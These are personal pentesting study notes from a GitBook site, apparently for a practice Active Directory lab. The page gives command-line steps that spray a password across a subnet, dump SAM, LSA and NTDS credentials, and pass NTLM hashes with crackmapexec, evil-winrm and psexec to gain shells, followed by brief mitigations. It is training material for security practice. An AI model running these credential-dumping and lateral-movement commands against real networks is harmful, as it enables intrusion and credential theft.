Practice
  • 🛤️TryHackMe Rooms
    • HackersVsHackers
    • Vulnnet - The End Game
    • Surfer
    • Corridor
    • Mustacchio
    • Wordpress: CVE-2021-29447
    • Bounty Hacker
    • Simple CTF
    • Agent Sudo
    • Lazy Admin
    • Ignite
    • Brooklynn 99
    • c4ptur3th3fl4g
    • Lian_Yu
    • Rabbit
    • Gallery
    • Overpass
    • Team
    • Easy Peasy
    • CmesS
    • Ultratech
    • Wonderland
    • Anonymous
    • GamingServer
    • Tomghost
    • ConvertMyVideo
    • DogCat
    • Blog
    • Git Happens
    • 0day
    • Road
    • Inferno
    • Opacity
    • Market Place
    • Valley CTF
    • Weasel
    • SafeZone
    • Blueprint
    • Fusion Corp
    • Quotient
    • Unbaked Pie
    • Kenobi
    • Steel Mountain
    • Alfred
    • Hack Park
    • Game Zone
    • Daily Bugle
    • Retro
    • Corp
    • Attacktive Directory
    • Vulnnet - Roasted
    • Vulnnet - Active
    • Vulnnet - Internal
    • Enterprise - Hard
    • Iron Corp - Hard
    • Ra - Hard
    • For Business Reasons
  • 📦HackTheBox
    • Linux Boxes
      • Lame
      • Shocker
      • Nibbles
      • Beep
      • Cronos
      • Nineveh
      • Sense
      • Solidstate
      • Node
      • Valentine
      • Poison
      • Sunday
      • Irked
      • FriendZone
      • Networked
      • Jarvis
      • Tabby
      • Mirai
      • Popcorn
    • Windows Boxes
      • Active
      • Forest
      • ChatterBox
      • Resolute
      • Intelligence
  • 🤖CTF's
    • CloudSEK CTFs
    • ACM Cyber - UCLA
  • ¯\_(ツ)_/¯
    • Interview Topics
  • 🪣BOF - OSCP
    • Basics
    • Spiking
    • FUZZing
    • Finding the Offset
    • Overwriting the EIP
    • Finding BAD Characters
    • Finding RIGHT Module
    • Generating Shellcode
  • 📛Active Directory
    • Basics
      • Managing AD Users
      • Managing AD Computers
      • Group Policies
      • Authentication Methods
      • Trees, Forests and Trusts
    • Enumeration Techniques
    • Initial Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
      • Token Impersonation - LM
      • Kerberoasting
      • cPassword / GPP Attack
      • URL File Attacks
      • PrintNightmare
      • Golden Ticket Attacks
      • ZeroLogon Attacks
    • Lateral Movement and Pivoting
      • File Transfers
      • Spawning Processes Remotely
      • Moving Laterally with WMI
      • Alternate Authentication Material
      • Abusing User's Behaviour
      • Port Forwarding
      • Maintaing Access
      • Pivoting
      • Cleaning Up
    • Other Resources
  • 🛡️Powershell Basics
    • Getting Started
      • Functions
  • 😁Others
    • API Security
    • Cloud Security
  • Enumeration
    • Local PrivEsc
    • Remoting
    • Persistence
    • Kerberos
Powered by GitBook
On this page
  1. Active Directory

Post Compromise Attacks

PRACTICE ! PRACTICE ! PRACTICE !

PreviousPost Compromise EnumerationNextToken Impersonation - LM

Last updated 1 year ago

Pass the Password Attacks

If we crack a potential password and or can dump the SAM hashes, either ways we can use both of these to move laterally into the network !

$ crackmapexec 192.168.169.0/24 -u fcastle -d MARVEL -p Password1
$ crackmapexec 192.168.169.0/24 -u fcastle -d MARVEL -p Password1 --sam
$ crackmapexec 192.168.169.0/24 -u fcastle -d MARVEL -p Password1 --lsa
$ crackmapexec 192.168.169.0/24 -u fcastle -d MARVEL -p Password1 --ntds

$ crackmapexec 192.168.169.0/24 -u fcastle -d MARVEL -H <NTLM Hash>

  • Do not spray the potential passwords on domain accounts because for an example there are 50 machines in a network, the username is still valid but the password isn't and if the suppose the tool which authenticates the domain accounts, fails continously - High chances are there for the domain account to get locked ( due to lockout policy of the user accounts on the domain )

Pass the Hash Attacks

Let's dump some hashes using secretsdump

$ impacket-secretsdump 'MARVEL/fcastle:Password1@192.168.169.133'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::

  • Whenever we dump the SAM file, we have a (uid : rid : lmhash : nthash)

Upon cracking the nthash, Administrator account doesn't give anything => It's been disabled ( shows nothing, a blank field), whereas Frank Castle's hash returns => Password1

We can pass NTLM hashes around the network but we cannot pass NTLMv2 hashes

  • Now let's pass the hash instead of providing the password :)

$ crackmapexec smb 192.168.169.0/24 -u 'Frank Castle' -H 64f12cddaa88057e06a81b54e73b949b --local-auth
$ evil-winrm -i 10.10.10.100 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

  • We can even pass the hash via impacket's psexec and gain a shell on the machine !

$ impacket-psexec 'marvel/fcastle@192.168.169.133 -hashes <lmhash>:<nthash>

Mitigation Strategies

Hard to prevent it completely, but we can make it more difficult for an attacker to attack !

  • Limit account re-use

- Avoid re-using local admin password

- Disable guest and administrator accounts

- Limit who is a local administrator

  • Utilize Strong Passwords

- The Longer the better ( above 14 characters )

- Avoid using common words, instead use long sentences

  • Privilege Access Management (PAM)

- Check out/in for sensitive accounts when needed

- Automatically rotate passwords on check-out and check-in

- Limits pass attacks as hash/password is strong and constantly rotated

📛
  • Pass the Password Attacks
  • Pass the Hash Attacks
  • Mitigation Strategies